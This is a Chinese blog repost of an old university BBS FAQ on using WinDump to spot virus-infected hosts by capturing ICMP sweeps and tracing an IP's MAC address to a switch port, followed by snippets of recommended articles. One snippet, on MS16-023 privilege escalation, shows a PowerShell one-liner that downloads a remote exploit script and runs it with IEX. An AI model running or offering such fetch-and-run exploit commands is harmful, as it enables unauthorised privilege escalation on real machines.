windump

最新推荐文章于 2024-04-07 18:27:00 发布
最新推荐文章于 2024-04-07 18:27:00 发布
阅读量445 收藏
点赞数
分类专栏: 网络 文章标签: file interface bbs sns sun cmd

http://windtear.net/archives/2004/04/05/000244.html D:/>windump -h
windump version current-cvs.tcpdump.org, based on tcpdump version current-cvs.tcpdump.org
WinPcap version 3.0 alpha, based on libpcap version current-cvs.tcpdump.org
Usage: windump [-aAdDeflnNOpqRStuvxX] [-B size] [-c count] [ -C file_size ]
                [ -F file ] [ -i interface ] [ -r file ] [ -s snaplen ]
                [ -T type ] [ -w file ] [ -E algo:secret ] [ expression ]

% tcpdump -h
tcpdump version 3.6.3
libpcap version 0.6
Usage: tcpdump [-adeflnNOpqRStuvxX] [-c count] [ -F file ]
                [ -i interface ] [ -r file ] [ -s snaplen ]
                [ -T type ] [ -U user ] [ -w file ] [ expression ]

发信人: windtear (看成败  人生豪迈), 信区: THUNet
标  题: [简易FAQ] 怎么知道谁中毒了
发信站: BBS 水木清华站 (Sun Nov  2 21:22:21 2003), 转信

[简易FAQ] 怎么知道谁中毒了

Q:      怎么知道谁中毒了
A:     抓包

Q:      怎么抓包
A:      WinDump

Q:      哪里有
A:      http://windump.polito.it/

Q:      连不上
A:      用代理 或者
        http://ipcn.org/windump/WinDump.exe
        http://ipcn.org/windump/WinPcap_3_0.exe

        (如果不想用 alpha 版本
        http://ipcn.org/windump/WinDump.v3.6.2.exe
        http://ipcn.org/windump/2.3-WinPcap.exe
        )

Q:      怎么用
A:      先装 WinPcap_3_0.exe
        再装 WinDump.exe
        开始->运行
        %SystemRoot%

        拷贝粘贴 WinDump.exe
        开始->运行
        cmd
        WinDump.exe -h

Q:      看不懂
A:      http://windump.polito.it/docs/manual.htm
        http://windump.polito.it/misc/faq.htm

A:      WinDump.exe -nn icmp

21:06:50.845294 IP 166.111.168.203 > 166.111.169.255: icmp 72: echo request seq 16436
21:06:51.023851 IP 166.111.168.203 > 166.111.170.17: icmp 72: echo request seq 21044
21:06:51.063603 IP 166.111.168.203 > 166.111.170.21: icmp 72: echo request seq 22068
21:06:51.133730 IP 166.111.168.203 > 166.111.170.28: icmp 72: echo request seq 23860
21:06:51.163858 IP 166.111.168.203 > 166.111.170.31: icmp 72: echo request seq 24628
Q:      谁中毒了
A:      166.111.168.203

Q:      我只想要 238 段的
A:      WinDump.exe -nn icmp and src net 166.111.238.0/24
        
Q:      怎么知道中毒的166.111.168.203是谁
A:      如是静态IP:看静态IP分配信息
        如不是:
        ping 166.111.168.203
        arp -a
        找到 166.111.168.203 的 mac
        166.111.168.203       00-50-ba-45-91-6f     dynamic
        00-50-ba-45-91-6f

Q:      然后呢
A:      到 3900(3300) 1100 查哪个端口
A:
--_-->  3900
Address found on port 17:
       Canonical address       Type
       00-50-ba-45-91-6f    Dynamic
or ---->        3900www
Success!
Address found on port 17
----->  1100
Location        VLAN ID Permanent
Unit 1 Port 12     1       No

Q:      不会
A:      发信到 sns_noc@mails.tsinghua.edu.cn

moleng_56
关注
专栏目录
windump3.9.3+winpcap
01-11
windump工具<br>大家下着用吧,先装里面的驱动,再在命令行运行
Get Winpcap和windump
weixin_34393428的博客
02-12 110
Before running WinDump, you have to download and install WinPcap 3.1 or newer. Click here to download WinPcap The latest WinDump version is 3.9.5. For the list of changes, refer to t...
windump介绍
blueman2012的专栏
09-08 2220
windump介绍 WindumpWindows环境下一款经典的网络协议分析软件,其Unix版本名称为Tcpdump。它可以捕捉网络上两台电脑之间所有的数据包,供网络管理员/入侵分析员做进一步流量分析和入侵检测。在这种监视状态下,任何两台电脑之间都没有秘密可言,所有的流量
【错误分享】打开Qt编译生成的软件,“无法找到入口”
最新发布
qq_35412059的博客
04-07 1165
这张图片显示的是一个计算机错误提示窗口,标题为“无法找到入口”。正文内容是:“无法定位程序输入点_Z21qRegisterResourceDataaiPKhS0_S0_于动态链接库Qt5Core.dll上。” 这意味着在尝试运行程序时遇到了问题。具体来说,该错误表明程序试图调用一个位于名为Qt5Core.dll的动态链接库文件中的函数(),但是找不到这个函数。
获取服务名、服务端口号、服务所用协议——getservent(),getservbyname(),getservbyport()
码农
08-16 4504
Services are represented by the port number portion of the address. Each service is offered on a unique, well-known port number. We can map a service name to a port number withgetservbyname, map a p
WinDump中文使手册.pdf
08-12
WinDump中文使手册
内容:-WinDump手册名称windump-–-获取网络流量命令格式windump.doc
10-11
WinDump手册——获取网络流量命令格式】 WinDump是一款网络数据包分析工具,类似于Unix环境下的tcpdump,它能够捕获并分析网络流量,帮助网络管理员监控和诊断网络问题。在Windows操作系统中,WinDump提供了丰富...
WinDump使用方法
06-01
WinDump是网络分析工具Wireshark的命令行版本,它基于libpcap库,用于捕获网络流量数据。本文将详细介绍WinDump的使用方法,帮助读者理解如何利用这个强大的工具来解析、分析网络通信。 首先,我们需要了解WinDump...
windump使用
10-28
D:\>windump -h windump version current-cvs.Windump.org, based on Windump versioncurrent-cvs.tc pdump.org WinPcap version 3.0 alpha, based on libpcap version current-cvs.Windump.org Usage: windump [-...
WinDump中文使手册共15页.pdf.zip
11-21
WinDump中文使用手册》是一份详尽的网络封包分析工具指南,旨在帮助用户理解和掌握WinDump的使用方法。WinDump是Wireshark项目的命令行版本,它能够捕获网络上的数据包并进行深入分析,是网络故障排查、安全审计和...
windows下编译出的snort.exe
04-04
根据在snort官网上下载的snort-2.9.11.1源码,在windows下编译出来的snort.exe;
Windump教程-参数介绍
热门推荐
海阔天空
03-18 1万+
1 应用 Windump是tcpdumpWindows版本,主要的参数如下: -D 列出所有的接口 -i interface 指定用于抓包的接口 -c packetcount 指定抓包的个数 -w filename 指定用于保存抓到的包的文件名 -C filesize 指定用于保存抓到的包的文件大小 -W filecount 指定保存多少个文件 -m MIB module 指定要
MS16-023提权 + 信息收集 + 静默WinPcap安装 + WinDump抓包
publicStr的博客
08-01 1590
0x01 MS16-023提权 powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1');Invok...
利用WinDump来探测HTTP网页数据包
记事本
05-09 207
54powerman windump是一个开源软件,可以进行各种协议的网络数据包探测,是一个不错的免费、开源Net Sniffer软件,当前最新版本是3.9.5,官方下载网址:http://www.winpcap.org/windump/install/。 详细的帮助文件官方网址是:http://www.winpcap.org/windump/docs/manual.htm 常用的参数: -w ...
WinPcap编程(二)
azy67351的博客
08-16 207
0. 这一次具体讲抓包的两种方法。 (建议)清除ARP表,最好自己写个批处理命令。快一点。 1.0 抓包步骤 步骤很简单:先打开适配器列表 --> 选择适配器 --> 通过遍历链表的方式到达你选择的适配器位置 --> 打开设备 --> 开始抓包。 每一个步骤都是一个函数。了解步骤,后面就好办。 首先,了解一个数据类型pcap/pcap_t。它代表...
Windump命令详解与参数使用
Windump是一款强大的网络数据包捕获工具,基于WinPcap库构建,适用于Windows环境。它允许用户实时监控和分析网络流量,主要用于网络故障排查、安全审计以及网络协议的研究。Windump的命令行界面(Usage)提供了丰富...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值